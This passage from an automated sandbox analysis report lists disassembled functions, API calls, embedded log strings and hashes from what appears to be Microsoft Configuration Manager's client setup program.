                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catchThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\path.cpp$..\path.cpp$CCM::Utility::Filesystem::Path::IsRelative$pszPath != 0
                                                                                          • API String ID: 765742432-1819834485
                                                                                          • Opcode ID: 59c0bf8d20b26256189e8f406676c676be68058d1edc4f6131224312076b880d
                                                                                          • Instruction ID: 04c79b761f9ac4d134eaa5e2259099834dc2ae69045804f0ce1eb87fc2fe4171
                                                                                          • Opcode Fuzzy Hash: 59c0bf8d20b26256189e8f406676c676be68058d1edc4f6131224312076b880d
                                                                                          • Instruction Fuzzy Hash: 22113460AC4351EDCB29DBA4485ABEF7E619F91F50F188049F9C41B3C2CEB54A05C3A1
                                                                                          Function 0064909D Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 149COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 006490A7
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005FA66C: __EH_prolog3_catch_GS.LIBCMT ref: 005FA673
                                                                                            • Part of subcall function 005FA66C: GetCurrentThreadId.KERNEL32 ref: 005FA6F9
                                                                                          Strings
                                                                                          • LSIsSiteVersionCompatible : Site Version is not in the required format, xrefs: 0064920A
                                                                                          • CCM::LocationServices::LSIsSiteVersionCompatible, xrefs: 006490EF
                                                                                          • LSIsSiteVersionCompatible : Site Version '%s' is not compatible., xrefs: 0064917C
                                                                                          • LSIsSiteVersionCompatible : Site Version '%s' is compatible., xrefs: 006491BB
                                                                                          • LSIsSiteVersionCompatible : Site Version '%s' is not compatible., xrefs: 0064923E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch_$CurrentH_prolog3Thread
                                                                                          • String ID: CCM::LocationServices::LSIsSiteVersionCompatible$LSIsSiteVersionCompatible : Site Version '%s' is compatible.$LSIsSiteVersionCompatible : Site Version '%s' is not compatible.$LSIsSiteVersionCompatible : Site Version '%s' is not compatible.$LSIsSiteVersionCompatible : Site Version is not in the required format
                                                                                          • API String ID: 4241523842-2022239765
                                                                                          • Opcode ID: 67aae98bd2eac0d665a79839c5a2979adefe86a59b736e3242e7a1402dab2ab6
                                                                                          • Instruction ID: 5d97f2329b60aa3b5507a128edf74527565f2dae9050ebfbafe593cf02c920ee
                                                                                          • Opcode Fuzzy Hash: 67aae98bd2eac0d665a79839c5a2979adefe86a59b736e3242e7a1402dab2ab6
                                                                                          • Instruction Fuzzy Hash: CE5146B1C01359AADF10DFE8C889ADEBFB9BF49300F24416AE504AB241DB745A49CF61
                                                                                          Function 005AA1E2 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 116COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 005AA1E9
                                                                                            • Part of subcall function 006092DC: __EH_prolog3.LIBCMT ref: 006092E3
                                                                                          • SysFreeString.OLEAUT32(?), ref: 005AA25C
                                                                                          • SysFreeString.OLEAUT32(?), ref: 005AA279
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          • Not a parse error, xrefs: 005AA305
                                                                                          • XML parsing error at line %u char %u: %s%s, xrefs: 005AA2DC
                                                                                          • X:\bt\1024777\repo\src\common\inc\ccmxml.h, xrefs: 005AA2C8, 005AA30B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeH_prolog3String$CurrentThread
                                                                                          • String ID: Not a parse error$X:\bt\1024777\repo\src\common\inc\ccmxml.h$XML parsing error at line %u char %u: %s%s
                                                                                          • API String ID: 2466513371-3031177609
                                                                                          • Opcode ID: adf9d214e931994d3ec7281b171273e43db44e5e92103b31949f05cd5260f2a9
                                                                                          • Instruction ID: 9862bba3a840c1ea632d87a213196de70138e544da7c56559d1b5ea9d3888673
                                                                                          • Opcode Fuzzy Hash: adf9d214e931994d3ec7281b171273e43db44e5e92103b31949f05cd5260f2a9
                                                                                          • Instruction Fuzzy Hash: 7F41377090020AAFCF15DFA4C889AEEBFB9BF59304F10405DE401B7292EB315A48CFA5
                                                                                          Function 005A8277 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 79sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005A827E
                                                                                          • Sleep.KERNEL32(?,00000002,?,?,?,00000008,?,?,InstallSelfExtractingEXE,00000030,0058F36E,?,?,?,00000001,?), ref: 005A8323
                                                                                          Strings
                                                                                          • Failed to install '%s' with retry-able error code 0x%x. Will retry in %d minutes., xrefs: 005A830A
                                                                                          • InstallSelfExtractingEXE, xrefs: 005A828A
                                                                                          • 0:l, xrefs: 005A82F3
                                                                                          • Failed to install '%s' with retry-able error code 0x%x. Retried with max count %d., xrefs: 005A8350
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catchSleep
                                                                                          • String ID: 0:l$Failed to install '%s' with retry-able error code 0x%x. Retried with max count %d.$Failed to install '%s' with retry-able error code 0x%x. Will retry in %d minutes.$InstallSelfExtractingEXE
                                                                                          • API String ID: 1566588488-3177027412
                                                                                          • Opcode ID: 193cb3ddf0253802bd16ea87ec32c18b14d11fef2767916c94325f689de43abd
                                                                                          • Instruction ID: e123d0cf07c63c588fd69d24e96f52521a0ca23445c29131d2685582ddb659df
                                                                                          • Opcode Fuzzy Hash: 193cb3ddf0253802bd16ea87ec32c18b14d11fef2767916c94325f689de43abd
                                                                                          • Instruction Fuzzy Hash: 3131897190024AEBCF11DF98CC49BEEBEB9BF55304F14841AF550A7291DB748A24DBA1
                                                                                          Function 005852A5 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 68threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005A8C4C: __EH_prolog3_catch_GS.LIBCMT ref: 005A8C53
                                                                                            • Part of subcall function 005A8C4C: GetCurrentThreadId.KERNEL32 ref: 005A8D17
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00585308
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00585303
                                                                                          • ccmsetup.cpp, xrefs: 00585310
                                                                                          • setupManifest.LoadXML( sFileManifest ), xrefs: 005852FE
                                                                                          • ccmsetup.cpp, xrefs: 005852F8
                                                                                          • Failed to load manifest file: %s. Error 0x%x., xrefs: 0058533D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$Failed to load manifest file: %s. Error 0x%x.$ccmsetup.cpp$ccmsetup.cpp$setupManifest.LoadXML( sFileManifest )
                                                                                          • API String ID: 229633481-3453240775
                                                                                          • Opcode ID: 9960c1c76e56b9d98eb7e24495a87ab84e51e77d506b36e20fe9c58f17fba2fa
                                                                                          • Instruction ID: a82b061d5943d3763812d395eab5d1db892c699bfb0b115d219d16392595c021
                                                                                          • Opcode Fuzzy Hash: 9960c1c76e56b9d98eb7e24495a87ab84e51e77d506b36e20fe9c58f17fba2fa
                                                                                          • Instruction Fuzzy Hash: 9021AE31E44258EADB11EBA4CD4ABEEBEB4BF61700F244085F5417B281DBB41F09CB62
                                                                                          Function 005C508A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 60threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005C5091
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005C50FB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catchThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CCM::Utility::Stream::Seek$X:\bt\1024777\repo\src\common\inc\ccmcom.h$operator->()->Seek( liSeek, dwOrigin, &ulNewPos )
                                                                                          • API String ID: 765742432-682750979
                                                                                          • Opcode ID: 0d2e7842dde500faae8f77dd172d4a81708bc6047515e71fa439d8b112c0424b
                                                                                          • Instruction ID: e509e5a8c9e6733f29fd9c5053620c035b8dd978f910f17239c230c34b7bb80b
                                                                                          • Opcode Fuzzy Hash: 0d2e7842dde500faae8f77dd172d4a81708bc6047515e71fa439d8b112c0424b
                                                                                          • Instruction Fuzzy Hash: 7F11AC71A4174AAFCB11DFE98D0AFAE7EB1BF45700F184099B950AB381D6319A00DBA1
                                                                                          Function 0062545B Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 57threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00625462
                                                                                            • Part of subcall function 00624884: __EH_prolog3_catch.LIBCMT ref: 0062488B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006254E2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch$CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\CcmCert.cpp$..\CcmCert.cpp$CcmUtilLib::CcmIsCNG_Allowed
                                                                                          • API String ID: 4040336050-813724672
                                                                                          • Opcode ID: 8cc9ff06ee3ceb99ee47fbb0af449f6dbed5dd4c4fc23990501de3a99bf5b134
                                                                                          • Instruction ID: 0956adf097339dd984a646e9d34d9d8c53ba39f75a955eb3499d483f20108639
                                                                                          • Opcode Fuzzy Hash: 8cc9ff06ee3ceb99ee47fbb0af449f6dbed5dd4c4fc23990501de3a99bf5b134
                                                                                          • Instruction Fuzzy Hash: 96115BB1E80B66DBCB21EBA4C806BEDBEA56F50711F144015F901AB3C2CA784A418B91
                                                                                          Function 0057C461 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 47threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057C4C1
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          • ccmsetup.cpp, xrefs: 0057C4C9
                                                                                          • ccmsetup.cpp, xrefs: 0057C4B1
                                                                                          • Digital signature verification has been disabled., xrefs: 0057C47F
                                                                                          • DetectIntuneClient(), xrefs: 0057C4B7
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057C4BC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$DetectIntuneClient()$Digital signature verification has been disabled.$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 2882836952-1437044323
                                                                                          • Opcode ID: 3268f74eaa562b62fe7778b30524928fb0db6f61bd92253f2fb7b1e05c1802a3
                                                                                          • Instruction ID: c6fe76c11035fa2acbefe8bca3301f24b2cb64643e4ebd0b1b37779817f48424
                                                                                          • Opcode Fuzzy Hash: 3268f74eaa562b62fe7778b30524928fb0db6f61bd92253f2fb7b1e05c1802a3
                                                                                          • Instruction Fuzzy Hash: E701FCB194035555DF21FF60D81BAFE6EA7BF85B10F184049F644BB2C2CB68464093E5
                                                                                          Function 0063C47E Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0063C485
                                                                                            • Part of subcall function 005F094C: __EH_prolog3_catch_GS.LIBCMT ref: 005F0956
                                                                                            • Part of subcall function 005F094C: GetCurrentThreadId.KERNEL32 ref: 005F09AC
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                            • Part of subcall function 005F6BC9: __EH_prolog3_catch.LIBCMT ref: 005F6BD0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch$CloseCurrentH_prolog3H_prolog3_catch_Thread
                                                                                          • String ID: ADTimeOutSeconds$CCM::LocationServices::CcmGetADTimeOut$LocationServices$Software\Microsoft\CCM\CCMExec
                                                                                          • API String ID: 1536388851-2223030457
                                                                                          • Opcode ID: c1b297d1a6d3e53c3a29f1a270254b993b0eb412e4e176cba32a867a130b5e98
                                                                                          • Instruction ID: 316f18cc44031a013ec212cc7dcad5811cef8dfb4e722cc67cca6922c9919e46
                                                                                          • Opcode Fuzzy Hash: c1b297d1a6d3e53c3a29f1a270254b993b0eb412e4e176cba32a867a130b5e98
                                                                                          • Instruction Fuzzy Hash: 3B21E170D0528AE9DF01DBA9C8097EDBFB4AF15320F14804AF550B7282CBB80B09D791
                                                                                          Function 00583376 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 22threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058339D
                                                                                          Strings
                                                                                          • ccmsetup.cpp, xrefs: 0058338D
                                                                                          • ccmsetup.cpp, xrefs: 005833A9
                                                                                          • CoSetProxyBlanket( spJob2, 0xFFFFFFFFL, 0xffffffff , 0, 0, 3, 0, EOAC_DYNAMIC_CLOAKING ), xrefs: 00583393
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00583398
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CoSetProxyBlanket( spJob2, 0xFFFFFFFFL, 0xffffffff , 0, 0, 3, 0, EOAC_DYNAMIC_CLOAKING )$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 2882836952-1981958577
                                                                                          • Opcode ID: 62d234048a79fb7f431b60ac5da0b9970f032f4b3f05fd52574f7c5372c1a965
                                                                                          • Instruction ID: 02583cf844b5f72a00bb602e40f98f5424efdd44662e5c88ef245c0e650902af
                                                                                          • Opcode Fuzzy Hash: 62d234048a79fb7f431b60ac5da0b9970f032f4b3f05fd52574f7c5372c1a965
                                                                                          • Instruction Fuzzy Hash: 8AE09230688288E9DB10AB209E9AFB83E61BB16F04F0448C8B905791C29FA54685C311
                                                                                          Function 005833D9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 22threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00583404
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$ccmsetup.cpp$ccmsetup.cpp$spJob2->SetCredentials(&bgCred)
                                                                                          • API String ID: 2882836952-2557803881
                                                                                          • Opcode ID: 2947fa17062e7e29bb0cc5d412093edad7f3e0d059f0d623f5440752c5f43fe1
                                                                                          • Instruction ID: 6c35bdcee1ac05e9eaf7d704fc59a660fcccef6bf786587a70ce0a94fdeee6e1
                                                                                          • Opcode Fuzzy Hash: 2947fa17062e7e29bb0cc5d412093edad7f3e0d059f0d623f5440752c5f43fe1
                                                                                          • Instruction Fuzzy Hash: B3E09230689288A5D710AB208C0AFB83E51AB17F05F4484C4B9057D1C3DBA44641C351
                                                                                          Function 005832FE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 21threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00583325
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$ccmsetup.cpp$ccmsetup.cpp$spCopyJob->QueryInterface(&spJob2)
                                                                                          • API String ID: 2882836952-3664994525
                                                                                          • Opcode ID: e1c7f3e1392f1bb1d425402d409f395f94cf0772197f35f8b959ac9a855323e0
                                                                                          • Instruction ID: 22a9a31fff86fcdadbb04b54cc1cb30b11279adec0ad6012afbc6b6524b68d38
                                                                                          • Opcode Fuzzy Hash: e1c7f3e1392f1bb1d425402d409f395f94cf0772197f35f8b959ac9a855323e0
                                                                                          • Instruction Fuzzy Hash: CEE04F30A84348E9FA14AB608D0BFFD3F15AF54F04F044599B904392C2DBB55A8AC756
                                                                                          Function 00583066 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 19threadCOMMON
